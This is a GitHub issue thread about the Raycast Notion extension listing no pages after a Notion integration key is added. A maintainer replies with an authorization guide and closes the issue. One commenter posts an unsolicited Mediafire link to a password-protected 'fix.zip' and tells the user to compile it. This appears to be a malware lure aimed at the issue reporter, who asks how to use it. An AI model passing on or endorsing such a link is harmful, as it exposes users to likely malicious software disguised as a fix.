### ISSUE TITLE
[Notion] Adding the Integration Key does not show the Pages available in Notion

### ISSUE THREAD

**Issue by ankur1674** [raycast/extensions#14709]
### Extension

https://www.raycast.com/notion/notion

### Raycast Version

1.83.1

### macOS Version

15.1

### Description

After adding the integration key to the extension, when trying to use the extension it loads nothing. All the extension says is 'no pages available.' I also tried to refresh and use a new key but still the same. 
![Screenshot 2024-09-29 at 8 33 04 AM](https://github.com/user-attachments/assets/4cf04eab-b7c6-4e05-abb2-9d393a33ecef)

### Steps To Reproduce

1. Add the integration key for Notion
2. Use the option to search the pages
3. The extension displays 'No Pages Available'
4. Other extensions also show the same blank page.

### Current Behaviour

Still is the same. I set the integration policy to Internal. Does not work

### Expected Behaviour

I expected to see the available notion pages on my account and be able to edit or add.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ankur1674** [comment]
Do I need to have Xcode for this? Also if you dont mind, can you please let me know how to use it?

**Comment by thomaslombart** [comment]
Have you ensured you have given the Raycast integration authorization to access your pages? If not, here's a [quick guide](https://github.com/raycast/extensions/tree/main/extensions/notion#i-cant-find-the-notion-page-or-database-from-raycast) for that.

**Comment by thomaslombart** [comment]
I'm closing this issue to maintain a clean backlog. Feel free to comment it if you still have the problem.
